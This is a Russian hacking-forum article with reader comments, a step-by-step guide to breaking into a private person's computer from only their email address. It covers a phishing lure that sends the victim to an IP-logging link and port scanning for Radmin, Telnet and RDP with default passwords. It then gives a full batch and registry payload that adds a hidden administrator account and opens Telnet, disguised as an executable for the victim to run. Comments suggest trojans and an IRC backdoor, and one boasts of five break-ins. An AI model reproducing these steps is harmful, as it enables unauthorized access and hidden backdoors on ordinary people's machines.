Взлом компа, зная только мейл — HackZona.Ru

Взлом компа, зная только мейл

Взлом компа, зная только мейл

Тип статьи:
Со старой ХакЗоны.
Источник:
Доброго времени суток.

Я уезжал на подкурсы, но вот, вернулся на 2 дня (субботу и воскресенье) и решил написать статейку.

Статья о том, как получить полный доступ к чужому компьютеру, зная только e-mail.
====================================================
Содержание:

1.) Предисловие
2.) Узнаем IP
3.) Пользуемся разными прогами (анализ полученных данных)
4.) Если анализ ничего не дал?
5.) Краткая теория
6.) Послесловие

====================================================
1.) Предисловие.

Для того чтобы пользоваться этим методом, надо определиться, нужно ли это Вам в реальности, или Вам хочется просто развлечь себя и доказать, что Вы — лучший(ая). Последнее было для меня стимулом для того чтобы все это проделывать, но теперь я многое понял, а главное — понял то, что взлом не должен проводится чтобы доказать окружающим тебя людям, что ты «кулхацкер». Каким я себя не считаю. Многому надо научиться, и после практики, если все получилось, на мой взгляд, не надо от нечего делать взламывать чужие компьютеры. Итак, надеюсь с целью все определились, перейдем к действию?

====================================================
2.) Узнаем IP.

Надеюсь ни для кого не секрет, что без IP, мы не сможем найти нужный нам компьютер, и следовательно — провести взлом. Так как же его узнать? (многие задаются этим вопросом и часто пишут мне на аську). Очень просто, нам потребуеются прямые руки, немного фантазии и онлайн сниффер.
Многие используют сниффер для увода cookies (куков, печенек, сессии — кому как нравится). Но в нашем случае, cookies нас не интересуют. Мы идем сюда и регистрируемся, если раньше этого не делали.

hacker-pro.net/sniffer/

Отлично. Пол дела сделанно. Теперь идем в «настройки», при необходимости загружаем свое изображение. И нам дается ссылка на сниффер, с редиректом (перенаправлением) на нашу картинку. Не забудьте поставить галочку на «записывать IP в лог». Надеюсь поняли о чем я? Нет?! Тогда читайте.
Смысл в том, чтобы дать эту ссылку своей «жертве», но только со ссылкой cпрятанной в слове (изучаем html), а если в лом, то просто берете:

Здесь пишите любой текст, или одно слово

Пишите какой-нибудь текст (включайте фантазию). Возьмеме самое простое:

===========
Здравствуйте! На Ваш E-mail адрес была отправленна открытка, чтобы посмотреть ее, нажмите сюда
===========

Это было самое легкое, советую придумать что-то более оригинальней. Всю эту муть отправляете жертве. При желании можно использовать сервисы анонимной отправки почты, или залить php скрипт, и самому сделать такой сервис. Можете использовать мой, но я могу его в любой момент отключить:

mqil.su/message/

Все, осталось жертве ПЕРЕЙТИ «посмотреть картинку», как IP палится в логе.
Не надо ничего никуда вводить, как в случае с фейком. В итоге все довольны, он (она), получила свою открытку, а Вы IP.

====================================================
3.) Пользуемся разными прогами (анализ полученных данных)

Теперь, у нас есть главное, без чего была бы невозможна дальнейшая работа. Дальнейшие действия — проверить хост (компьютер) на наличие уязвимостей — открытых портов. Я для этих целей пользуюсь сканером [XSpider 7.5], Вы можете использовать любой другой, на Ваш вкус. Но лучше всего использовать несколько сканеров, что не покажет один — покажет другой.

Сразу качаем себе [XSpider 7.5] отсюда — depositfiles.com/files/tcdbrurxj
Обновлять не рекомендую, так как версия крякнутая, и полностью рабочая.

Теперь когда Вы скачали его, необходимо его настроить — создать новый профиль. Кто-то на сайте описывал настройку профиля, но чтобы Вам не приходилось искать статью, я Вам опишу настройку.

Открываете сканер
>>>Профиль
>>>Новый…
>>>Комментарий (пишите что хотите)
>>>Идете на вкладку «Сканер Портов», и внизу рядом с надписью «default.prt» давите [...]
>>>Выйдет окошко, давите «новый»
>>>Пустой
>>>В комментах пишите что угодно
>>>внизу увидеть «добавить порты» и пишите «4899» и «3389»
>>>Сохранить как «4899».
>>>Дольше выходите обратно на вкладки, и снимаете отовсюду галки.

Точно также создаете еще 1 профиль, только порт 23. Все.

Теперь вбиваете IP своей жертвы, в поле «добавить хост» и начинаете сканировать. Если вдруг открытым оказался один из портов 4899 — Radmin, 23 — telnet, 3389 — Remote Desktop (удаленный рабочий стол) — пробуете законнектиться (подключиться). Пароль по дефолту 12345678, об этом уже писалось. Самое лучшее (для меня), когда открыт 4899 порт (Radmin). Подключились? Радуйтсь!
Дальше можете делать все что Вашей душе угодно. Дальше читать не обязательно.

но чтобы не палиться, рекомендую Вам убрать иконку в трее (рядом с часиками), и создать нового пользователя, с правами администратора. (об этом между прочим тоже писалось раньше) — не буду писать, а то статья очень большая получится.

Remote Desktop входит в стандартную комплектацию Windows.
RAdmin Viewer можете скачать тут — depositfiles.com/files/92m5usz2b
В нем же есть и telnet
P>S
RAdmin тоже входит в стандартную комплектацию.

Если не получилось подключиться, не отчаиваемся, читаем дальше.

=====================================================
4.) Если анализ ничего не дал?

Если он ничего не дал, то можно своими усилиями помочь себе. Делается это просто, серверная часть устанавливается на удаленный компьютер/открывается нужный порт с нужным логином и паролем. Конечно, но как установить/открыть, если компьютер далеко???

— А для чего интернет?? WWW — World Wide Web — ВСЕМИРНАЯ паутина.
Через интернет тоже можно установить программу на чужой компьютер/или открыть доступ к уже существующему.
Radmin если что, тоже идет в стандартной комплектации Windows. А установить, что это действительно Windows, можно тем же сканером. Значит — нам остается только открыть доступ к этому сервису (23). Об этом до нас тоже позаботились, и написали вот такой *.txt файл, который в последствии переименовывается в *.bat.
Затем создается еще один файл, файл конфигурации реестра, который скрывает нового пользователя с глаз, и его не видно в окне приветствия.

содержимое *.bat файла
++++
chcp 1251
net user SUPPORT_388945a0 /delete
net user restot 12345678 /add
net localgroup Администраторы restot /add
net localgroup Пользователи SUPPORT_388945a0 /del
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
++++

Этим файлом Вы создаете нового пользователя с именем restot и паролем 12345678
импортируете в реестр настройки, которые скроют Ваше имя в окне приветствия.
открываете 972 порт, и активируете телнет через него.

Записывается без плюсиков в блокнот, потом меняется расширение на *.bat

теперь содержимое файла conf.reg
++++
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
NTCurrentVersionWinlogonSpecialAccountsUserLis t]
«restot»=dword:00000000
++++

В последней строке, в кавычках, пишите имя, которое указали в *.bat файле.
также записываете в блокнот, а потом меняете расширение на *.reg

сохраняете все это в одной папке, можно просто заархивировать оба файла в один архив, а можно поступить умнее, скомпилировать файл *.bat в файл *.exe, и также добавить в архив поменяв иконку, об этом читайте в статьях на портале. После того как жертва запустит батник, можно будет коннектиться к 972 порту, или к любому другому, главное чтобы не был занят...

затем можно установить то что нужно через службу Telnet, и более комфортно управлять удаленной машиной.
==========================================================
5.) Краткая теориия|||
==================

находите жертву >>> узнаете ip >>> проверяете на наличие открытых портов >>> открываете порты (если открытых не было) >>> устанавливаете через telnet то что нужно для удобство >>> осуществляете свой злобный план…
==========================================================
6.) Послесловие|||
==================
Статья писалась пару месяцев назад, я наисал начало, и сохранил в блокноте, сейчас увидел, решил дописать и выложить Концовка не полная, но статья ориентированна для немного понимающих юзеров, поэтому разберетесь.
Статья не является каким-то уникальным способом взломать чужой компьютер, даже не знаю, зачем я ее выложил. но тем не менее, если она прошла модерацию, и вы ее сейчас читаете, то знайте, что писалось чтобы помочь вам, читателям.

Конструктивная критика принимается, рад услышать мнение людей.
Всем спс за внимание, до новых встреч.
Нравится
Не нравится

54 комментария

23:33
Ссылка на [XSpider 7.5] не пашет. :( так кому нужен придётся искать своими силами.
01:08
да не беда, а нафиг тогда гугл? ))
22:08
Надеюсь найдете сканер, если не найдете пишите в аську, помогу..
18:22
Есть несколько недачетов, а именно: Radmin не входит в поставку виндовс,в поставку входит telnet, Radmin-порт 4899, а telnet 23. Вроде все.Статья норм мне понравилась ;)
19:01
я не понял как тоян в текст захуярить!? у меня по ссылке не переходит...
06:41
нафиг хспайдер нмап форева (%
23:10
old scool !:)
20:48
хорошая статейка :) автору респект
23:14
чёто както нефига не пашет
23:36
а как подключиться? нашёл парочку IP правда находит всего лишь 3389 и всё, и что дальше не знаю...
13:59
у меня пишет Доступна информация
Windows
Описание

Вероятная версия операционной системы : Windows
Доступна информация
Удалённое управление
Описание

Запущен сервис удалённого управления компьютером.
16:40
класс работает
16:41
http://download1.famatech.com/download/files/radmin34ru.zip
17:25
статья не очень ( как, уже говорилось в коментах радмин НЕ входит в комплектацию окна. Еть тольк зверь какой-нить или ему подобная сборка может включить его с пассом по дефолту.
и я так и не понял, а как ты телнетом доступ получишь к компу-то? как зальёшь радмин?? ну вот у меня например и 22,23 порты открыты и 4899.. радмин есть, телнет юзаю, SSH... а толку-то? брутить пассы заколебаешься. Как например ты ко мне попадёшь???
07:16
Здесь указана абсолютная ложь! Если на компе пользователя стоит Интернет секюрити Касперский или Нортон, то подключится вообще невозможно!!!!!
16:16
Написанно нормально +1, но это для конкретного примера, всех так ломать не получится, поэтому в любом случае, если хочешь влезть в чужой комп, да еще, чтобы можно было нормально поприкалываться нужен троянская программа класса Бэк-дор.......
22:42
Познавательно. На 4+ потянет :)
15:32
хорошо написал!+1
13:55
Иботня!?@/&%*=<>&#163;$&#165;#§
14:43
статья просто супер с её помощью я сломал уж 5 компов. жду что нибуть ещё в этом роде.
15:41
для познавания неплохо 4.5 +
18:53
Всё это конечно работает, дело в том что существуют 2 вида ip (белый, серый) динамический и статический, другими словами если наша жертва сидит в своей локалке а её провайдер использует серый ip то подключится к ней можно будет только из этой сети либо устанавливать специальный софт типа виртуальной сети hamachi, а это зделать очень трудно не имею доступа к компьютеру локально! Вывод всё это будет работать при условии что есть белый IP.
19:00
С таким же успехом можно реализовать всё выше написаное через IRC (Internet Relay Chat) для тех кто в танке. Пишется скрипт для клиента, каторый будет выполнять команды поступающие в #канал. Например можно найти скрипт каторый дублирует cmd.exe. Процесс можно переименовать в какой нибудь sv_chost.exe. Проблема как скрыть значёк mIRC в трее.
Плюсы:
Необнаруживается антивирусами.
Небудет проблем с подключением.
Минусы:
Если у жертвы уже стоит mIRC будут конфликтовать.
22:03
Отличная статья!
22:44
я блин непойму это
"Дольше выходите обратно на вкладки, и снимаете отовсюду галки. "
имеется ввиду снять во всех вкладках галки??а дальше шо ну снял я,потом сканирую и ниодного опрта ненаходит

00:32
В принципе ничего нового. Главное узнать IP компа.
Узнать его можно и без ящика. Просто создаешь страничку на любому web языке. Даешь ссылку жертве, чтобы перешли. А скрипт записывает IP-ники и отсылает тебе.
После чего, ты берешь и сканируешь спайдером комп на уязвимости.
Если нашлась, качай эксплойт и пытайся заюзать. Систему патчат не многие, поэтому может повезет, если фаервол не помешает.
Удаленную систему можно скомпрометировать не только этим способом. Можно просто дать файл, а если быть точным троян. Здесь достаточно вступить в контакт с жертвой и под видом доброй программки всучить. Можно даже сделать SFX архив и к нему прилепить свой файл. Троян откуда взять спросите вы =) Написать... Это не так сложно. Готовые решения ИМХО фуфло (если они халявные. Объяснять почему, не буду. Думаю сами догадаетесь)
01:37
to z1kad1n
to xaker99

это удаленное управление кампутером.
командная строка - mstsc - дальше вписываете ip который вам нужен - еще дальше логин и пароль, и управляете компом
===
немного знающим юзерам, понятно, что ничего нового здесь нет, но чайники может найдут интересное для себя что-то...
===

отдельно некоторым людям, которые пишут что статья фуфло.
безусловно, каждый может высказывать свое мнение, но если ты отписался в данной статье что она фуфло, будь добр, ссылку на свою статью тоже выкладывай. потом и посмотрим.
22:06
@ В последней строке, в кавычках, пишите имя, которое указали в *.bat файле.
также записываете в блокнот, а потом меняете расширение на *.reg @ Обясни плиз я невовсем понял эти строки СТАТЬЯ ПРОСТО КЛАСС
00:06
народ дайти кто нить радмина плз!старого просто поисковики облазил нашол тока новые!
21:30
Статья для школьников! Пусть на таком компе будут открыты нужные порты и я туда войду,и что мне там делать?Включить его в свою бот-сеть?Как правило такие компы с динамическим IP и старым модемом.Нужен мне такой канал?Десятка два фотографий,да столько-же дебильных игр.Париться из за этого-больно надо!Себя не уважать.
19:02
хм... методика почти никогда не работает.
19:16
чет я не въехал... не помню, чтобы
"Radmin если что, тоже идет в стандартной комплектации Windows."
эт в какой же комплектации идет радмин , да еще и висит на 23 портуОоОООоо имхо хрень какая то
11:36
to kazin8
radmin входит в стандартную комплектацию windows xp если ставить ее через zver cd и написано там норм все у radmina 4899 порт а у telnet 23))
22:22
Норм статейка! Только ссылка на Xspaider не рабочая а обидно... Автору спасибо большое!
21:27
Щааас проверим))
23:10
хаха это тема хакерство для новичков?)))
08:19
Ну так для новичков будет полезно почитать книжку по параметрам командной строки. И еще лучше знать PHP, Delphi или С++ (ну короче надо хотя бы быть новичком в программировании). Статья на 4. Спасибо
08:21
А кто сможет заломать сайт с помощью только ссылкой на него???? :))))
19:20
А от удал галки убирать то?????
14:03
Статья говно. Автор - мудак.
18:22
Скажите !!!!!!! Ребят!!!!! Я только одно не понял, где нужно указать мейл жертвы???????????????
20:41
время ток потерял на чтение не очем...
02:32
Здесь был FieroXak привет всем
17:52
все сделал также токо не понял как ваити на комп порт 23 открыт а далше што как ваити с помощью какои программы?
00:03
Доброго времени суток!
Подскажите пожалуйста открит порт 23 ,а как законектиться?
У меня почему-то не получяется.
09:24
Дайте ссылку на рабочий Xspaider
16:33
Автору respect. Коротко и ясно. Правдо не все так гладко как сдесь указано))))
03:09
все работает, автору респект)
15:37
smart_boy мыло жертвы указывать нигде не надо, надо на мейл выслать письме с замаскированной ссылкой на твою картинку, дальше смотришь в логах IP
08:39
Нахуя сннифер, если я знаю мыло? Просто нужно дождаться ответа и посмотреть ip. Так ведь легче!
10:52
2Kvadratification.

на вкус и на цвет - товарища нет.
чтобы посмотреть ip нужно пользоваться почтовыми клиентами типа Outlook, The Bat! и тд. а я уверен, что большинство прочитавших статью просматривают почту в браузере, то есть веб. Там ip нету.
10:54
у кого вопросы - велком в аську
единственное - не просить взломать мыло..
я только объясняю.
попрошаек сразу в игнор
Комментарий удален
15:32
походу ресурс умер? все старое тут(((